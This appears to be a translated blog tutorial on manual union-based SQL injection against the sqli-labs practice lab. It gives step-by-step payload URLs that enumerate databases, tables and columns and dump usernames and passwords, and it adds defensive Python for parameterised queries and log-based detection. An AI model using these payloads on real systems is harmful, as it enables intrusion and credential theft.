2025-02-24 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
This article walks through a sample analysis of manual SQL injection in detail. The editor thinks it is quite practical and shares it here for reference; I hope you gain something from reading it.
For convenience of explanation, we continue to use the numeric injection point from the previous article as the example.
Getting the total number of fields
From the previous article, we already know that the id parameter of http://localhost/sqlilabs/Less-2/?id=1 is an injection point.
The SQL statement in the backend is written roughly as follows:
select username,password,[....] from table where id=userinput
Next we determine how many fields the select returns by appending an order by clause. The payload becomes:
http://localhost/sqlilabs/Less-2/?id=1 order by 1 (then 2, 3, 4, ...)
With order by 4 the program reports an error, so the select returns a total of 3 fields.
Getting the display positions
The fields returned by the select are shown on the page. Next we determine which of them are actually displayed.
Use either of the following payloads to find out:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,3
http://localhost/sqlilabs/Less-2/?id=1 and 1=2 union select 1,2,3
With either payload, the page appears as follows:
As the page shows, the values displayed are the second and third fields.
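The two probes above (order by to count fields, union select to find the display positions) only work because the id value is pasted straight into the statement. The following added example, not code from the original article or from sqli-labs, replays both probes against a constructed three-column users table in sqlite3 (standing in for MySQL) through a concatenating lookup and through a parameterised one, showing that the hardened lookup leaks nothing.

```python
import sqlite3

# Constructed stand-in for the sqli-labs 'users' table (id, username, password);
# sqlite3 replaces the MySQL backend so the demo runs offline.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you');
""")

def vulnerable_lookup(user_input: str):
    # The backend pattern from the article: user input is pasted into the statement.
    sql = f"select id,username,password from users where id={user_input}"
    return conn.execute(sql).fetchall()

def hardened_lookup(user_input: str):
    # Same query with the value bound as a parameter; anything that is not an
    # integer is rejected before it reaches the database.
    if not user_input.strip().lstrip("-").isdigit():
        raise ValueError("id must be an integer")
    sql = "select id,username,password from users where id=?"
    return conn.execute(sql, (int(user_input),)).fetchall()

def count_columns(lookup, max_try=6) -> int:
    """Replay the 'order by N' probe: return the largest N that does not error."""
    found = 0
    for n in range(1, max_try + 1):
        try:
            lookup(f"1 order by {n}")
            found = n
        except (sqlite3.Error, ValueError):
            break
    return found

def display_positions(lookup):
    """Replay '-1 union select 1,2,3': return the marker row that comes back."""
    try:
        rows = lookup("-1 union select 1,2,3")
    except (sqlite3.Error, ValueError):
        return None
    return rows[0] if rows else None
```

Against vulnerable_lookup the probes recover 3 columns and the marker row (1, 2, 3); against hardened_lookup both probes return nothing, while a normal id still works.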
Finding the database names
Once we know the display positions, we can use them to show the information we want, such as the database version and user information. The following payload retrieves that information:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,version(),database()
The page is then displayed as:
You can see that the database version and the name of the database currently in use appear on the page.
In the same way we can find the names of all databases on the server. The payload is as follows:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME from information_schema.SCHEMATA limit 0,1 (gets the first database name)
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME from information_schema.SCHEMATA limit 1,1 (gets the second database name, and so on)
Finding the table names
Since database() returns the name of the database used by the current web application, we use it to query all table information. From the previous step we also already know that the current database is security.
We construct the payload as follows:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
This gives us the names of all tables in the current database. The page returns:
So we know that the current database has four tables: emails, referers, uagents and users.
Finding the column names
Once we know a table name, we can use information_schema.columns to get all fields of that table. The payload is as follows:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273 (0x7573657273 is the string users in hex)
The page displays the following results:
From this statement we learn that the users table has the fields USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,id,name,password. In my local test, however, there was a problem here: the users table of the security database actually has only three fields, id, username and password. The other fields came from tables that are also named users in other databases, because the payload filters on table_name only and not on the database.
With the same payload we can also find the field names of emails, referers and uagents.
Sometimes, however, the backend code only lets a where clause through, so the column names cannot be obtained from information_schema.columns; then they can only be guessed from experience. The guessing method is fairly simple: use an exists clause. Assume we already know the table name (table names are guessed the same way, with exists).
The payload is as follows:
http://localhost/sqlilabs/Less-2/?id=1 and exists(select uname from users)
The key part is exists(select <column name to guess> from users). If the users table has no uname column, the page shows no content or directly shows a SQL error:
As follows:
The following shows a field that does exist in the users table:
http://localhost/sqlilabs/Less-2/?id=1 and exists(select username from users)
Here we guess that the users table has a username column. The statement above returns normally, so the username column really does exist in the users table.
Dumping the data
Once we know all table and field names of the current database, we can dump all of its data. For example, to download all data from the current users table, use the following payload:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username,password),3 from users
This returns all username and password data in the users table; the data in other tables can be retrieved in the same way.
That is all for this sample analysis of manual SQL injection. I hope the content above is of some help and lets you learn more; if you think the article is good, please share it so that more people can see it.
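Every stage of this walkthrough leaves a characteristic query string in the web server's access log: an order by probe, a union select, a reference to information_schema, and an exists(select ...) guess. The following detector, added here and not part of the original article, decodes the id parameter from constructed Apache-style log lines that replay those stages and reports which stage each line matches.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (abbreviated Apache combined format) replaying the
# stages of the walkthrough above, plus one benign request on line 1.
SAMPLE_LOG = """\
127.0.0.1 - - [31/May/2024:10:00:01 +0800] "GET /sqlilabs/Less-2/?id=1 HTTP/1.1" 200 512
127.0.0.1 - - [31/May/2024:10:00:02 +0800] "GET /sqlilabs/Less-2/?id=1%20order%20by%204 HTTP/1.1" 200 480
127.0.0.1 - - [31/May/2024:10:00:03 +0800] "GET /sqlilabs/Less-2/?id=-1+union+select+1,version(),database() HTTP/1.1" 200 530
127.0.0.1 - - [31/May/2024:10:00:04 +0800] "GET /sqlilabs/Less-2/?id=-1+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database() HTTP/1.1" 200 560
127.0.0.1 - - [31/May/2024:10:00:05 +0800] "GET /sqlilabs/Less-2/?id=1+and+exists(select+username+from+users) HTTP/1.1" 200 512
"""

# Each rule is (stage name, regex applied to the decoded, lower-cased parameter values).
RULES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+")),
    ("union display-position probe", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema enumeration", re.compile(r"\binformation_schema\.")),
    ("boolean column guess", re.compile(r"\bexists\s*\(\s*select\b")),
]
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def decode_query(line: str) -> str:
    """Extract the request target and return its decoded parameter values."""
    m = REQUEST_RE.search(line)
    if not m:
        return ""
    # parse_qsl undoes both %20 and + encoding, so the rules see what the database saw.
    pairs = parse_qsl(urlsplit(m.group(1)).query)
    return " ".join(value for _, value in pairs).lower()

def classify(line: str):
    """Return the names of every rule that fires on one log line."""
    query = decode_query(line)
    return [name for name, rx in RULES if rx.search(query)]

def scan(log_text: str):
    """Map each matching line number (1-based) to the stages it triggered."""
    hits = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        stages = classify(line)
        if stages:
            hits[n] = stages
    return hits
```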